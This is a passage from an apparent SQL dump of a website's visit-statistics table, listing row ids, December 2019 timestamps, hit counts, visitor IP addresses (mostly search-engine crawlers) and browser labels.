,1576688099,1,1,0,0,'8.29.198.26','other'),(469656,1576688434,1,1,0,0,'207.46.13.78','other'),(469657,1576688458,1,1,0,0,'91.196.178.72','firefox'),(469658,1576688645,1,1,0,0,'8.29.198.27','other'),(469659,1576689100,1,1,0,0,'66.249.64.26','chrome'),(469660,1576689663,1,1,0,0,'103.137.75.12','chrome'),(469661,1576691127,1,1,0,0,'91.196.178.131','chrome'),(469662,1576691305,1,1,0,0,'157.55.39.229','other'),(469663,1576691593,1,1,0,0,'66.249.64.26','chrome'),(469664,1576691725,1,1,0,0,'207.46.13.78','other'),(469665,1576692458,1,1,0,0,'141.8.183.33','other'),(469666,1576692862,1,0,1,0,'13.66.139.0',''),(469667,1576693442,1,1,0,0,'5.45.207.49','other'),(469668,1576694069,1,1,0,0,'66.249.70.33','chrome'),(469669,1576694542,1,1,0,0,'93.72.141.140','firefox'),(469670,1576694849,1,1,0,0,'207.46.13.48','other'),(469671,1576695617,1,1,0,0,'178.154.171.134','other'),(469672,1576695764,1,1,0,0,'66.249.70.36','chrome'),(469673,1576695922,3,3,0,0,'207.46.13.248','other'),(469674,1576695941,4,4,0,0,'207.46.13.201','other'),(469675,1576696076,1,1,0,0,'31.13.127.16','other'),(469676,1576696077,1,1,0,0,'31.13.127.8','other'),(469677,1576696331,1,1,0,0,'207.46.13.48','other'),(469678,1576696480,3,3,0,0,'207.46.13.216','other'),(469679,1576696925,1,1,0,0,'207.46.13.78','other'),(469680,1576697506,1,1,0,0,'195.128.17.206','other'),(469681,1576698076,1,1,0,0,'178.154.171.134','other'),(469682,1576698080,1,1,0,0,'207.46.13.78','other'),(469683,1576698908,1,1,0,0,'66.249.70.36','chrome'),(469684,1576699024,1,1,0,0,'8.29.198.26','other'),(469685,1576699529,1,1,0,0,'8.29.198.25','other'),(469686,1576699979,2,2,0,0,'5.58.53.161','firefox'),(469687,1576700112,1,0,1,0,'66.249.64.28',''),(469688,1576701153,1,1,0,0,'66.249.64.27','chrome'),(469689,1576701254,3,3,0,0,'66.249.64.26','chrome'),(469690,1576701356,1,1,0,0,'207.46.13.251','other'),(469691,1576702318,1,1,0,0,'207.46.13.78','other'),(469692,1576702425,3,3,0,0,'157.55.39.233','other'),(469693,1576702602,1,1,0,0,'66.249.64.26','chrome'),(469694,1576703171,1,1,0,0,'178.154.171.134','other'),(469695,1576705169,1,1,0,0,'77.123.94.79','msie'),(469696,1576706049,1,1,0,0,'176.106.197.212','firefox'),(469697,1576706074,1,1,0,0,'77.123.94.79','msie'),(469698,1576707006,1,1,0,0,'66.249.64.27','chrome'),(469699,1576707624,1,1,0,0,'31.13.127.10','other'),(469700,1576707625,1,1,0,0,'31.13.127.19','other'),(469701,1576707904,1,1,0,0,'66.249.64.28','chrome'),(469702,1576709025,1,1,0,0,'188.163.102.173','firefox'),(469703,1576709088,1,1,0,0,'176.120.100.9','opera'),(469704,1576709319,1,1,0,0,'91.196.178.54','chrome'),(469705,1576709935,2,2,0,0,'8.29.198.26','other'),(469706,1576710655,1,1,0,0,'178.154.171.134','other'),(469707,1576712483,1,1,0,0,'157.55.39.221','other'),(469708,1576712571,1,1,0,0,'207.46.13.48','other'),(469709,1576712572,1,1,0,0,'207.46.13.78','other'),(469710,1576713160,1,1,0,0,'207.46.13.162','other'),(469711,1576715122,2,2,0,0,'178.154.171.134','other'),(469712,1576715524,1,1,0,0,'66.249.64.27','chrome'),(469713,1576716078,2,2,0,0,'207.46.13.48','other'),(469714,1576716722,1,1,0,0,'157.55.39.221','other'),(469715,1576716914,1,1,0,0,'62.205.134.182','other'),(469716,1576717291,1,1,0,0,'66.249.64.26','chrome'),(469717,1576718784,2,2,0,0,'66.249.64.26','chrome'),(469718,1576718926,1,1,0,0,'157.55.39.221','other'),(469719,1576719334,1,1,0,0,'66.249.64.28','chrome'),(469720,1576720839,1,1,0,0,'8.29.198.25','other'),(469721,1576721174,2,2,0,0,'66.249.64.27','chrome'),(469722,1576721462,1,1,0,0,'8.29.198.27','other'),(469723,1576722332,1,1,0,0,'37.9.113.33','other'),(469724,1576722825,1,1,0,0,'66.249.64.27','chrome'),(469725,1576723750,1,1,0,0,'157.55.39.221','other'),(469726,1576723837,1,1,0,0,'5.255.253.8','other'),(469727,1576724030,1,1,0,0,'93.78.184.56','firefox'),(469728,1576724718,1,1,0,0,'52.26.31.20','chrome'),(469729,1576724722,1,1,0,0,'52.34.24.33','other'),(469730,1576725438,1,1,0,0,'207.46.13.15','other'),(469731,1576726055,1,1,0,0,'178.154.171.134','other'),(469732,1576726982,1,1,0,0,'207.46.13.89','other'),(469733,1576727199,2,2,0,0,'207.46.13.15','other'),(469734,1576727431,1,1,0,0,'178.154.171.134','other'),(469735,1576727466,1,1,0,0,'178.154.171.127','other'),(469736,1576727804,1,1,0,0,'93.78.184.56','firefox'),(469737,1576730082,1,1,0,0,'141.8.142.2','other'),(469738,1576731561,1,1,0,0,'195.128.17.206','other'),(469739,1576731714,2,2,0,0,'8.29.198.27','other'),(469740,1576732146,2,2,0,0,'207.46.13.89','other'),(469741,1576732334,1,1,0,0,'141.8.183.53','other'),(469742,1576732744,1,1,0,0,'104.227.246.106','chrome'),(469743,1576733073,1,1,0,0,'216.74.107.220','chrome'),(469744,1576733973,1,1,0,0,'157.55.39.145','other'),(469745,1576734109,1,1,0,0,'178.154.171.134','other'),(469746,1576734287,1,1,0,0,'62.205.134.182','other'),(469747,1576735357,1,1,0,0,'66.249.64.27','chrome'),(469748,1576735675,1,1,0,0,'66.249.64.26','chrome'),(469749,1576736082,1,1,0,0,'213.32.6.140','firefox'),(469750,1576736541,1,1,0,0,'207.46.13.89','other'),(469751,1576737661,1,1,0,0,'178.154.171.134','other'),(469752,1576738255,1,0,1,0,'66.249.64.27',''),(469753,1576738563,1,1,0,0,'178.154.171.134','other'),(469754,1576738758,1,1,0,0,'95.134.174.144','chrome'),(469755,1576739150,1,1,0,0,'5.45.207.49','other'),(469756,1576739528,1,1,0,0,'91.196.178.75','chrome'),(469757,1576739616,1,1,0,0,'66.249.64.28','chrome'),(469758,1576739833,1,1,0,0,'66.249.64.27','chrome'),(469759,1576739851,1,1,0,0,'91.197.220.134','chrome'),(469760,1576740057,1,1,0,0,'141.8.183.111','other'),(469761,1576740086,1,1,0,0,'91.196.178.178','firefox'),(469762,1576740557,1,1,0,0,'66.249.64.28','chrome'),(469763,1576741034,1,1,0,0,'82.207.49.98','chrome'),(469764,1576741564,1,1,0,0,'157.55.39.145','other'),(469765,1576742622,1,1,0,0,'8.29.198.25','other'),(469766,1576743233,1,1,0,0,'157.55.39.145','other'),(469767,1576743235,1,1,0,0,'8.29.198.27','other'),(469768,1576743782,1,1,0,0,'93.119.227.19','other'),(469771,1576743783,1,1,0,0,'69.4.89.106','firefox'),(469772,1576743798,1,1,0,0,'93.119.227.91','other'),(469773,1576743799,1,1,0,0,'93.119.227.91','firefox'),(469776,1576744245,1,1,0,0,'207.148.93.136','chrome'),(469777,1576744246,1,1,0,0,'207.148.93.136','firefox'),(469778,1576744619,1,1,0,0,'157.55.39.241','other'),(469779,1576744672,1,1,0,0,'207.46.13.89','other'),(469780,1576744701,1,1,0,0,'66.249.64.28','chrome'),(469781,1576744963,1,1,0,0,'178.154.171.127','other'),(469782,1576745029,2,0,2,0,'112.111.162.89',''),(469783,1576745920,1,1,0,0,'178.154.171.134','other'),(469784,1576746389,1,1,0,0,'85.198.130.228','other'),(469785,1576746426,1,1,0,0,'193.239.217.129','chrome'),(469786,1576746685,2,2,0,0,'195.10.210.70','chrome'),(469787,1576746990,1,1,0,0,'66.249.64.27','chrome'),(469788,1576747543,1,1,0,0,'157.55.39.241','other'),(469789,1576747596,1,1,0,0,'178.154.171.134','other'),(469790,1576747814,1,1,0,0,'45.40.120.16','chrome'),(469791,1576747915,1,1,0,0,'91.196.178.29','chrome'),(469792,1576748192,1,1,0,0,'66.249.70.62','chrome'),(469793,1576748235,1,1,0,0,'66.249.64.28','chrome'),(469794,1576748880,1,1,0,0,'178.154.171.134','other'),(469795,1576749815,1,1,0,0,'66.249.64.26','chrome'),(469796,1576749930,1,1,0,0,'66.249.64.28','chrome'),(469797,1576750548,2,2,0,0,'91.196.178.161','chrome'),(469798,1576750886,1,1,0,0,'3.134.111.84','chrome'),(469799,1576750959,1,1,0,0,'66.249.64.28','chrome'),(469800,1576751423,1,1,0,0,'66.249.64.27','chrome'),(469801,1576751524,1,1,0,0,'66.249.64.26','chrome'),(469802,1576751955,2,2,0,0,'157.55.39.145','other'),(469803,1576751978,2,2,0,0,'207.46.13.96','other'),(469804,1576752065,1,1,0,0,'141.8.188.25','other'),(469805,1576752221,1,1,0,0,'207.46.13.89','other'),(469806,1576752441,1,1,0,0,'157.55.39.241','other'),(469807,1576752520,1,1,0,0,'37.9.113.33','other'),(469808,1576753092,1,1,0,0,'91.196.178.75','chrome'),(469809,1576753307,1,1,0,0,'194.44.173.14','firefox'),(469810,1576753397,2,2,0,0,'207.46.13.96','other'),(469811,1576753524,1,1,0,0,'8.29.198.26','other'),(469812,1576753898,1,1,0,0,'157.55.39.241','other'),(469813,1576754100,1,1,0,0,'8.29.198.27','other'),(469814,1576754526,1,1,0,0,'109.74.154.72','chrome'),(469815,1576755264,1,1,0,0,'66.249.70.36','chrome'),(469816,1576755286,2,2,0,0,'66.249.64.26','chrome'),(469817,1576755552,1,1,0,0,'176.111.33.18','firefox'),(469818,1576756152,1,1,0,0,'91.196.178.98','chrome'),(469819,1576756406,1,1,0,0,'107.21.1.8','other'),(469820,1576756408,1,1,0,0,'54.208.102.37','other'),(469821,1576756673,2,2,0,0,'66.249.64.27','chrome'),(469822,1576756817,1,1,0,0,'66.249.64.26','chrome'),(469823,1576757602,1,1,0,0,'31.13.127.2','other'),(469824,1576757603,1,1,0,0,'31.13.127.13','other'),(469825,1576758059,1,1,0,0,'66.249.64.27','chrome'),(469826,1576758412,1,1,0,0,'91.196.178.175','chrome'),(469827,1576758787,2,0,2,0,'157.55.39.145',''),(469828,1576759240,1,1,0,0,'207.46.13.89','other'),(469829,1576759292,1,1,0,0,'157.55.39.241','other'),(469830,1576759536,2,2,0,0,'66.249.64.27','chrome'),(469831,1576759879,1,1,0,0,'66.249.64.28','chrome'),(469832,1576760744,1,1,0,0,'91.196.178.89','chrome'),(469833,1576760775,1,1,0,0,'91.196.177.82','chrome'),(469834,1576760968,2,2,0,0,'157.55.39.241','other'),(469835,1576761668,1,1,0,0,'93.119.227.34','firefox'),(469837,1576761691,2,2,0,0,'157.55.39.100','other'),(469838,1576762121,1,1,0,0,'5.45.207.65','other'),(469839,1576762376,21,21,0,0,'167.172.103.66','chrome'),(469840,1576762528,1,1,0,0,'91.196.178.175','chrome'),(469841,1576762553,1,1,0,0,'91.196.178.136','chrome'),(469842,1576763407,1,1,0,0,'66.249.64.27','chrome'),(469843,1576763617,1,1,0,0,'66.249.64.26','chrome'),(469844,1576763708,1,1,0,0,'138.246.253.5','chrome'),(469845,1576764348,1,1,0,0,'78.106.248.138','other'),(469846,1576764393,1,1,0,0,'141.8.142.132','other'),(469847,1576764430,2,2,0,0,'8.29.198.26','other'),(469848,1576764431,1,1,0,0,'91.200.54.165','chrome'),(469849,1576765364,1,1,0,0,'46.211.218.250','chrome'),(469850,1576766240,2,0,2,0,'207.46.13.89',''),(469851,1576766372,1,1,0,0,'91.196.178.132','chrome'),(469852,1576766458,1,1,0,0,'66.249.64.26','chrome'),(469853,1576766633,1,1,0,0,'157.55.39.59','other'),(469854,1576766947,1,1,0,0,'37.9.113.33','other'),(469855,1576767030,1,1,0,0,'37.9.113.6','other'),(469856,1576767866,1,1,0,0,'46.211.128.104','chrome'),(469857,1576767876,1,1,0,0,'46.211.147.75','chrome'),(469858,1576768055,1,1,0,0,'66.249.64.26','chrome'),(469859,1576768127,1,1,0,0,'31.13.115.21','other'),(469860,1576768128,1,1,0,0,'31.13.115.16','other'),(469861,1576768269,1,1,0,0,'92.113.188.119','chrome'),(469862,1576768319,1,1,0,0,'141.8.142.119','other'),(469863,1576768626,1,1,0,0,'157.55.39.100','other'),(469864,1576769133,2,2,0,0,'91.196.178.189','chrome'),(469865,1576769265,1,1,0,0,'37.54.23.125','chrome'),(469866,1576769420,1,1,0,0,'141.8.183.67','other'),(469867,1576769502,1,1,0,0,'46.211.128.74','chrome'),(469868,1576769606,1,1,0,0,'91.196.178.169','chrome'),(469869,1576769811,1,1,0,0,'94.153.109.21','chrome'),(469870,1576769924,1,1,0,0,'91.196.178.161','chrome'),(469871,1576769978,1,1,0,0,'91.196.178.78','chrome'),(469872,1576770356,1,1,0,0,'88.154.158.169','chrome'),(469873,1576770658,1,1,0,0,'46.211.151.55','chrome'),(469874,1576770920,1,1,0,0,'88.198.33.145','other'),(469875,1576770947,20,20,0,0,'164.68.121.239','other'),(469876,1576771232,1,1,0,0,'162.210.196.100','other'),(469877,1576771704,1,1,0,0,'91.196.178.37','other'),(469878,1576771902,1,1,0,0,'95.134.97.104','chrome'),(469879,1576772175,1,1,0,0,'128.124.4.243','chrome'),(469880,1576772230,1,1,0,0,'91.196.178.69','chrome'),(469881,1576773034,1,1,0,0,'37.9.113.97','other'),(469882,1576773043,1,1,0,0,'141.8.188.18','other'),(469883,1576773044,1,1,0,0,'91.196.178.102','chrome'),(469884,1576773257,3,0,3,0,'157.55.39.223',''),(469885,1576773499,1,1,0,0,'185.151.86.110','chrome'),(469886,1576773581,1,1,0,0,'157.55.39.241','other'),(469887,1576774009,1,1,0,0,'91.196.178.17','other'),(469888,1576774073,1,1,0,0,'35.195.76.50','chrome'),(469889,1576774149,1,1,0,0,'46.211.157.200','chrome'),(469890,1576774360,1,0,1,0,'157.55.39.223',''),(469891,1576774544,1,1,0,0,'157.55.39.223','other'),(469892,1576775007,1,1,0,0,'91.196.177.46','chrome'),(469893,1576775099,2,2,0,0,'157.55.39.100','other'),(469894,1576775364,2,2,0,0,'8.29.198.26','other'),(469895,1576775568,1,1,0,0,'141.8.188.20','other'),(469896,1576775652,2,2,0,0,'91.196.178.47','chrome'),(469897,1576776014,1,1,0,0,'46.133.235.236','chrome'),(469898,1576776033,2,2,0,0,'46.211.143.31','chrome'),(469899,1576776285,1,1,0,0,'88.154.79.98','chrome'),(469900,1576776719,1,1,0,0,'95.216.15.49','other'),(469901,1576776721,1,1,0,0,'46.211.134.192','chrome'),(469902,1576777267,2,2,0,0,'14.176.223.33','chrome'),(469903,1576777270,1,1,0,0,'14.176.223.33','msie'),(469904,1576777315,1,1,0,0,'131.159.24.47','other'),(469905,1576777488,1,1,0,0,'141.8.183.18','other'),(469906,1576778112,2,0,2,0,'157.55.39.68',''),(469907,1576778154,1,1,0,0,'91.196.178.98','chrome'),(469908,1576778225,1,1,0,0,'46.211.138.189','chrome'),(469909,1576778261,1,1,0,0,'66.249.64.28','chrome'),(469910,1576778761,1,1,0,0,'66.249.64.27','chrome'),(469911,1576778847,1,1,0,0,'82.145.222.165','chrome'),(469912,1576779033,1,1,0,0,'141.8.132.37','other'),(469913,1576779327,1,1,0,0,'91.196.178.4','other'),(469914,1576779335,1,1,0,0,'46.211.138.189','chrome'),(469915,1576779424,2,0,2,0,'207.46.13.224',''),(469916,1576779449,4,4,0,0,'157.55.39.223','other'),(469917,1576779779,1,1,0,0,'157.55.39.68','other'),(469918,1576779989,1,1,0,0,'207.46.13.224','other'),(469919,1576780155,1,1,0,0,'31.13.127.4','other'),(469920,1576780157,1,1,0,0,'31.13.127.22','other'),(469921,1576780158,1,1,0,0,'31.13.127.17','other'),(469922,1576780159,1,1,0,0,'31.13.127.23','other'),(469925,1576780226,1,1,0,0,'37.57.176.94','chrome'),(469926,1576780839,1,1,0,0,'94.153.109.155','chrome'),(469927,1576781054,1,1,0,0,'91.196.178.92','chrome'),(469928,1576781206,2,0,2,0,'207.46.13.224',''),(469929,1576781256,1,1,0,0,'95.108.181.103','other'),(469930,1576781411,1,1,0,0,'88.154.60.55','chrome'),(469931,1576781434,1,1,0,0,'66.102.9.191','chrome'),(469932,1576781853,1,1,0,0,'91.196.178.173','chrome'),(469933,1576781921,2,2,0,0,'91.196.178.37','chrome'),(469934,1576782204,1,1,0,0,'95.108.213.61','other'),(469935,1576782349,2,0,2,0,'207.46.13.224',''),(469936,1576782640,1,1,0,0,'46.211.217.71','other'),(469937,1576782733,1,1,0,0,'46.211.245.247','chrome'),(469938,1576783520,1,1,0,0,'13.66.139.0','other'),(469939,1576783823,2,2,0,0,'46.211.143.173','chrome'),(469940,1576784331,2,2,0,0,'66.249.64.27','chrome'),(469941,1576784386,1,1,0,0,'66.249.64.26','chrome'),(469942,1576784782,1,1,0,0,'87.250.224.104','other'),(469943,1576786272,1,1,0,0,'8.29.198.26','other'),(469944,1576786395,1,1,0,0,'91.196.178.165','other'),(469945,1576786445,1,1,0,0,'91.196.178.189','chrome'),(469946,1576786637,1,1,0,0,'85.86.168.166','firefox'),(469947,1576786799,1,1,0,0,'13.66.139.0','other'),(469948,1576786801,1,1,0,0,'8.29.198.27','other'),(469949,1576787246,1,1,0,0,'87.250.224.104','other'),(469950,1576787866,1,1,0,0,'91.196.178.100','chrome'),(469951,1576787939,2,0,2,0,'207.46.13.224',''),(469952,1576788052,1,1,0,0,'46.133.106.16','chrome'),(469953,1576788087,1,1,0,0,'90.188.255.142','chrome'),(469954,1576788512,2,2,0,0,'66.249.64.26','chrome'),(469955,1576788921,1,1,0,0,'176.121.228.108','firefox'),(469956,1576789492,1,1,0,0,'157.55.39.68','other'),(469957,1576789508,2,2,0,0,'46.211.238.202','chrome'),(469958,1576789553,2,0,2,0,'207.46.13.224',''),(469959,1576791057,3,1,2,0,'207.46.13.224',''),(469960,1576791674,1,1,0,0,'66.249.64.26','chrome'),(469961,1576791809,1,1,0,0,'157.55.39.68','other'),(469962,1576791932,1,1,0,0,'185.22.175.135','chrome'),(469963,1576793463,1,1,0,0,'13.66.139.0','other'),(469964,1576793799,2,0,2,0,'207.46.13.224',''),(469965,1576794121,1,1,0,0,'207.46.13.224','other'),(469966,1576794633,2,0,2,0,'157.55.39.84',''),(469967,1576794729,1,1,0,0,'141.8.132.37','other'),(469968,1576795891,1,1,0,0,'37.9.113.97','other'),(469969,1576795935,1,1,0,0,'141.8.188.18','other'),(469970,1576796622,1,1,0,0,'157.55.39.84','other'),(469971,1576797102,1,1,0,0,'157.55.39.68','other'),(469972,1576797170,1,1,0,0,'8.29.198.26','other'),(469973,1576797703,1,1,0,0,'8.29.198.25','other'),(469974,1576798666,2,0,2,0,'157.55.39.84',''),(469975,1576799418,2,0,2,0,'207.46.13.224',''),(469976,1576801027,1,1,0,0,'37.9.113.202','other'),(469977,1576801057,1,0,1,0,'207.46.13.224',''),(469978,1576801086,1,1,0,0,'207.46.13.224','other'),(469979,1576802305,7,7,0,0,'144.76.137.254','other'),(469980,1576803314,1,1,0,0,'62.205.134.182','other'),(469981,1576803380,2,0,2,0,'207.46.13.185',''),(469982,1576803595,2,0,2,0,'157.55.39.84',''),(469983,1576804260,1,1,0,0,'37.9.113.33','other'),(469984,1576804488,1,1,0,0,'66.249.70.33','chrome'),(469985,1576805231,1,1,0,0,'207.46.13.185','other'),(469986,1576805453,1,1,0,0,'141.8.188.39','other'),(469987,1576807193,2,0,2,0,'207.46.13.185',''),(469988,1576807306,2,2,0,0,'66.249.64.26','chrome'),(469989,1576808052,2,2,0,0,'8.29.198.26','other'),(469990,1576809305,1,1,0,0,'141.8.142.128','other'),(469991,1576809402,1,1,0,0,'66.249.64.26','chrome'),(469992,1576810813,1,1,0,0,'141.8.188.20','other'),(469993,1576810889,2,2,0,0,'66.249.64.26','chrome'),(469994,1576811744,1,1,0,0,'66.249.70.36','chrome'),(469995,1576813101,1,1,0,0,'54.191.164.3','chrome'),(469996,1576813104,1,1,0,0,'52.41.211.72','other'),(469997,1576814022,1,1,0,0,'141.8.183.18','other'),(469998,1576814938,1,1,0,0,'95.108.213.61','other'),(469999,1576814956,1,1,0,0,'141.8.142.128','other'),(470000,1576815493,1,1,0,0,'66.249.64.26','chrome'),(470001,1576815972,1,1,0,0,'5.45.207.65','other'),(470002,1576816017,1,1,0,0,'141.8.132.19','other'),(470003,1576816020,1,1,0,0,'37.9.113.163','other'),(470004,1576818230,1,1,0,0,'37.9.113.200','other'),(470005,1576818566,1,1,0,0,'66.249.64.26','chrome'),(470006,1576818926,2,2,0,0,'8.29.198.25','other'),(470007,1576820474,1,1,0,0,'62.205.134.182','other'),(470008,1576820534,1,1,0,0,'95.108.181.103','other'),(470009,1576820734,3,0,3,0,'157.55.39.84',''),(470010,1576821741,1,0,1,0,'157.55.39.84',''),(470011,1576821994,1,1,0,0,'66.249.64.27','chrome'),(470012,1576823412,2,0,2,0,'207.46.13.185',''),(470013,1576823903,1,1,0,0,'31.13.103.1','other'),(470014,1576823904,1,1,0,0,'31.13.103.20','other'),(470015,1576823934,1,1,0,0,'31.13.103.18','other'),(470016,1576823935,1,1,0,0,'31.13.103.17','other'),(470017,1576824245,1,1,0,0,'91.196.178.162','other'),(470018,1576824351,1,1,0,0,'31.13.115.4','other'),(470019,1576824353,1,1,0,0,'31.13.115.3','other'),(470020,1576824979,1,1,0,0,'46.211.144.29','chrome'),(470021,1576825267,1,1,0,0,'157.55.39.84','other'),(470022,1576825541,2,2,0,0,'91.196.178.75','chrome'),(470023,1576826110,1,1,0,0,'207.46.13.185','other'),(470024,1576826299,1,1,0,0,'66.249.64.26','chrome'),(470025,1576826914,1,1,0,0,'91.196.178.75','chrome'),(470026,1576827631,1,1,0,0,'5.45.207.65','other'),(470027,1576827637,1,1,0,0,'91.196.178.129','firefox'),(470028,1576827761,1,1,0,0,'95.108.213.39','other'),(470029,1576829809,1,1,0,0,'8.29.198.25','other'),(470030,1576829861,1,1,0,0,'188.165.255.126','msie'),(470031,1576830313,1,1,0,0,'8.29.198.26','other'),(470032,1576830796,1,1,0,0,'207.46.13.185','other'),(470033,1576831464,1,1,0,0,'138.246.253.5','chrome'),(470034,1576831900,1,1,0,0,'207.46.13.253','other'),(470035,1576832567,1,1,0,0,'66.249.70.33','chrome'),(470036,1576832631,1,1,0,0,'194.183.171.140','chrome'),(470037,1576832904,1,1,0,0,'207.46.13.117','other'),(470038,1576833265,1,1,0,0,'66.249.64.28','chrome'),(470039,1576833270,1,1,0,0,'31.13.127.16','other'),(470040,1576833271,1,1,0,0,'31.13.127.21','other'),(470043,1576833633,1,1,0,0,'91.196.178.75','chrome'),(470044,1576834014,1,1,0,0,'141.8.188.38','other'),(470045,1576834109,1,1,0,0,'94.244.45.60','chrome'),(470046,1576834338,1,1,0,0,'91.196.177.46','chrome'),(470047,1576834529,1,1,0,0,'66.249.64.28','chrome'),(470048,1576834934,1,1,0,0,'207.46.13.185','other'),(470049,1576835085,1,1,0,0,'66.249.64.26','chrome'),(470050,1576835339,1,1,0,0,'141.8.183.67','other'),(470051,1576836005,2,2,0,0,'66.249.64.27','chrome'),(470052,1576836716,1,1,0,0,'66.249.70.33','chrome'),(470053,1576837039,1,1,0,0,'37.54.20.166','chrome'),(470054,1576837043,1,1,0,0,'62.210.5.253','firefox'),(470055,1576837224,2,2,0,0,'207.46.13.117','other'),(470056,1576837467,1,1,0,0,'31.13.127.1','other'),(470057,1576837468,1,1,0,0,'31.13.127.15','other'),(470060,1576837681,1,1,0,0,'66.249.64.28','chrome'),(470061,1576838058,1,1,0,0,'66.249.64.27','chrome'),(470062,1576838102,1,1,0,0,'66.249.64.26','chrome'),(470063,1576838373,1,0,1,0,'157.55.39.84',''),(470064,1576838614,1,1,0,0,'62.210.10.77','firefox'),(470065,1576838757,1,1,0,0,'66.249.64.28','chrome'),(470066,1576838828,1,1,0,0,'207.46.13.117','other'),(470067,1576838893,1,1,0,0,'193.107.72.66','chrome'),(470068,1576838928,1,1,0,0,'91.196.178.75','chrome'),(470069,1576839193,1,1,0,0,'207.46.13.253','other'),(470070,1576839200,1,1,0,0,'157.55.39.84','other'),(470071,1576839221,3,3,0,0,'95.132.6.83','chrome'),(470072,1576839664,1,1,0,0,'77.233.10.37','msie'),(470073,1576839700,1,1,0,0,'66.249.64.28','chrome'),(470074,1576840609,1,1,0,0,'109.74.154.72','chrome'),(470075,1576840654,1,1,0,0,'66.249.64.28','chrome'),(470076,1576840700,1,1,0,0,'8.29.198.26','other'),(470077,1576840745,1,1,0,0,'207.46.13.117','other'),(470078,1576840930,1,1,0,0,'185.183.96.122','chrome'),(470079,1576841131,1,1,0,0,'91.196.178.186','chrome'),(470080,1576841183,1,1,0,0,'8.29.198.27','other'),(470081,1576842466,1,1,0,0,'207.46.13.117','other'),(470082,1576843336,1,1,0,0,'66.249.64.26','chrome'),(470083,1576843800,2,2,0,0,'207.46.13.117','other'),(470084,1576844630,1,1,0,0,'66.249.64.27','chrome'),(470085,1576845076,1,1,0,0,'195.88.158.190','chrome'),(470086,1576845205,1,1,0,0,'66.249.64.26','chrome'),(470087,1576845538,1,1,0,0,'91.196.177.46','chrome'),(470088,1576845585,1,1,0,0,'198.108.66.176','other'),(470089,1576845623,3,1,2,0,'207.46.13.185',''),(470090,1576845663,1,1,0,0,'207.46.13.195','other'),(470091,1576846366,1,1,0,0,'198.108.66.144','other'),(470092,1576846463,1,1,0,0,'91.196.178.75','chrome'),(470093,1576846505,1,1,0,0,'95.132.62.193','chrome'),(470094,1576846592,1,1,0,0,'207.46.13.117','other'),(470095,1576847383,1,1,0,0,'66.249.64.26','chrome'),(470096,1576848140,1,1,0,0,'46.211.141.136','other'),(470097,1576848268,1,1,0,0,'91.196.178.75','chrome'),(470098,1576848785,1,1,0,0,'66.249.70.33','chrome'),(470099,1576849013,1,1,0,0,'66.249.64.26','chrome'),(470100,1576849015,1,1,0,0,'207.46.13.117','other'),(470101,1576849780,1,1,0,0,'141.8.142.132','other'),(470102,1576850810,1,1,0,0,'194.153.128.166','chrome'),(470103,1576850833,1,1,0,0,'5.45.207.44','other'),(470104,1576851595,1,1,0,0,'8.29.198.26','other'),(470105,1576852062,1,1,0,0,'8.29.198.27','other'),(470106,1576852441,2,2,0,0,'212.111.199.46','firefox'),(470107,1576852455,1,1,0,0,'66.249.64.26','chrome'),(470108,1576852772,2,0,2,0,'207.46.13.117',''),(470109,1576852966,1,1,0,0,'141.8.142.115','other'),(470110,1576853882,3,3,0,0,'207.46.13.185','other'),(470111,1576854233,1,1,0,0,'66.249.70.36','chrome'),(470112,1576854484,1,1,0,0,'66.249.64.28','chrome'),(470113,1576854597,1,1,0,0,'209.17.96.170','other'),(470114,1576854905,1,1,0,0,'207.46.13.195','other'),(470115,1576855567,1,1,0,0,'91.196.178.93','firefox'),(470116,1576856484,1,1,0,0,'65.154.226.109','msie'),(470117,1576856707,1,1,0,0,'66.249.64.27','chrome'),(470118,1576857448,2,1,1,0,'207.46.13.195',''),(470119,1576857779,1,1,0,0,'198.108.66.64','other'),(470120,1576858131,1,1,0,0,'66.249.64.28','chrome'),(470121,1576858263,2,1,1,0,'207.46.13.195',''),(470122,1576860215,3,1,2,0,'207.46.13.185',''),(470123,1576860532,4,0,4,0,'207.46.13.195',''),(470124,1576860937,1,1,0,0,'207.46.13.117','other'),(470125,1576861066,1,1,0,0,'37.9.113.33','other'),(470126,1576861186,1,1,0,0,'66.249.64.28','chrome'),(470127,1576861396,1,1,0,0,'207.46.13.185','other'),(470128,1576861414,2,2,0,0,'66.249.64.27','chrome'),(470129,1576861509,1,1,0,0,'207.46.13.195','other'),(470130,1576861972,1,1,0,0,'207.46.13.117','other'),(470131,1576862494,1,1,0,0,'8.29.198.27','other'),(470132,1576862930,1,1,0,0,'66.249.70.36','chrome'),(470133,1576862947,1,1,0,0,'8.29.198.26','other'),(470134,1576862999,1,1,0,0,'66.249.64.27','chrome'),(470135,1576863007,2,0,2,0,'207.46.13.185',''),(470136,1576863328,1,0,1,0,'66.249.70.62',''),(470137,1576863456,1,1,0,0,'77.74.177.113','chrome'),(470138,1576864157,1,1,0,0,'207.46.13.185','other'),(470139,1576864902,1,1,0,0,'207.46.13.117','other'),(470140,1576865040,1,1,0,0,'141.8.142.177','other'),(470141,1576865448,1,1,0,0,'207.46.13.195','other'),(470142,1576866118,1,1,0,0,'141.8.142.119','other'),(470143,1576866520,1,0,1,0,'207.46.13.232',''),(470144,1576866723,1,0,1,0,'207.46.13.117',''),(470145,1576867880,1,1,0,0,'46.211.157.131','chrome'),(470146,1576868618,1,1,0,0,'66.249.64.27','chrome'),(470147,1576869071,1,1,0,0,'141.8.188.66','other'),(470148,1576869584,1,1,0,0,'46.201.200.244','chrome'),(470149,1576870339,1,1,0,0,'207.46.13.226','other'),(470150,1576870996,2,2,0,0,'207.46.13.195','other'),(470151,1576871020,1,1,0,0,'141.8.132.9','other'),(470152,1576871046,1,1,0,0,'66.249.64.28','chrome'),(470153,1576871847,1,1,0,0,'91.196.178.180','chrome'),(470154,1576872185,2,2,0,0,'66.249.64.26','chrome'),(470155,1576872266,1,1,0,0,'69.171.251.36','other'),(470156,1576872267,1,1,0,0,'69.171.251.45','other'),(470159,1576872681,1,1,0,0,'13.66.139.0','other'),(470160,1576873379,2,2,0,0,'8.29.198.27','other'),(470161,1576874057,1,1,0,0,'5.45.207.44','other'),(470162,1576874762,2,2,0,0,'66.249.64.28','chrome'),(470163,1576875835,1,1,0,0,'95.108.213.61','other'),(470164,1576875956,1,1,0,0,'54.36.149.102','other'),(470165,1576877276,1,1,0,0,'207.46.13.195','other'),(470166,1576877323,1,1,0,0,'46.201.200.244','opera'),(470167,1576877509,1,1,0,0,'66.249.64.28','chrome'),(470168,1576877531,2,2,0,0,'66.249.64.27','chrome'),(470169,1576877838,1,1,0,0,'207.46.13.226','other'),(470170,1576878261,1,1,0,0,'66.249.70.33','chrome'),(470171,1576878615,1,1,0,0,'1